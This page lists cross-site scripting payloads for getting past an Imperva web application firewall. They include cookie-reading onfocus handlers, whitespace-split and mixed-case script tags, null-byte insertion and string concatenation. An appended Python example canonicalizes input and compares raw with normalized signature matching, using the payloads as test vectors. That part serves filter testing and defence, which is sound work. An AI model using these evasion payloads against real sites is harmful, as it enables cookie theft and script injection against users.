Our cases for bypassing the WAF (Imperva)
Payload
- autofocus/onfocus=any() --> onfocus=;var{cookie}=document;write(cookie)
- autofocus/onfocus
- onfocus=any() --> onfocus=;write(cookie)
- onfocus=any() --> onfocus=;Function(`ale`+`rt(domain)`)()
<script>alert(1)</script>
Encoded tabs/newlines/CR
<script	>alert(1)</script>
<script
>alert(1)</script>
<script
>alert(1)</script>
Capital letters
<ScRipT>alert(1)</sCriPt>
Adding null bytes:
<%00script>alert(1)</script>
<script>al%00ert(1)</script>
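Every variant above works only when the filter matches the raw value while the application or browser acts on a decoded, case-insensitive form. As an added example (not part of the original page), the Python below canonicalizes a value before matching and compares that with a raw substring match; the signatures, function names and the repeated-decoding step are assumptions made for this example, not Imperva's rules.

```python
import re
from urllib.parse import unquote

# Stand-in for a signature matched against the raw request value (assumption).
RAW_SIGNATURE = "<script>alert("

# Signatures applied after canonicalization; illustrative, not a full rule set.
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b")
EVENT_ATTR = re.compile(r"(?:^|[\s/\"'])on[a-z]+\s*=")

def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable, drop NUL bytes, fold case."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\x00", "").lower()

def raw_match(value: str) -> bool:
    return RAW_SIGNATURE in value

def normalized_match(value: str) -> bool:
    canon = canonicalize(value)
    return bool(SCRIPT_TAG.search(canon) or EVENT_ATTR.search(canon))

# Test vectors: the page's variants, with whitespace and NUL both literal and
# percent-encoded (the encoded spellings are constructed for this example).
VARIANTS = [
    "<script\t>alert(1)</script>",
    "<script%0a>alert(1)</script>",
    "<script%0d>alert(1)</script>",
    "<ScRipT>alert(1)</sCriPt>",
    "<%00script>alert(1)</script>",
    "<script>al%00ert(1)</script>",
    "autofocus/onfocus=;write(cookie)",
]
BENIGN = ["The script ran on Monday", "q=on-call+rota&page=2"]

def evaluate():
    """Return (vector, raw_hit, normalized_hit) for each test vector."""
    return [(v, raw_match(v), normalized_match(v)) for v in VARIANTS + BENIGN]

if __name__ == "__main__":
    for vector, raw_hit, norm_hit in evaluate():
        print(f"raw={raw_hit!s:5} normalized={norm_hit!s:5} {vector!r}")
```

Matching on the canonical form is a backstop; contextual output encoding in the application is what removes the injection itself.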